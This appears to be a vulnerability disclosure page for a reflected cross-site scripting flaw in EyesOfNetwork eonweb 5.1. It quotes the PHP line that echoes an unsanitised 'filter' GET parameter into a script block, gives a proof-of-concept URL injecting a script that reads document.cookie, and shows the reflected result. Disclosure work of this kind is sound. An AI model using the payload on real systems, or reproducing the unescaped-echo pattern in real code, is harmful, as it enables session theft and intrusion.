Skip to content

eyesofnetwork_eonweb 5.1_filter_cross site scripting (XSS)

jsj730sos edited this page Sep 26, 2017 · 6 revisions

Eonweb_module_module_filters_index.php cross-site scripting (XSS)

Powered by shaojiejiang from SkyEye Labs

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

module/module_filters/module_filters.php Line 32

<script type="text/javascript"> // on page load $(document).ready(function() { $('#loading').hide(); var filter = "<?php echo (isset($_GET["filter"])) ? $_GET["filter"] : false ?>"; $("#filter_choice option[name='"+filter+"']").attr("selected","yes");

$_GET["filter"] has not been filtered to cause cross-site scripting (XSS)

EXP:

https://192.168.227.169/module/module_filters/index.php?filter=</script><script>alert(document.cookie)</script>

the return page has the payload:

<script type="text/javascript"> // on page load $(document).ready(function() { $('#loading').hide(); var filter = "</script><script>alert(document.cookie)</script>"; $("#filter_choice option[name='"+filter+"']").attr("selected","yes"); updateFields("/cache/admin-ged.xml"); });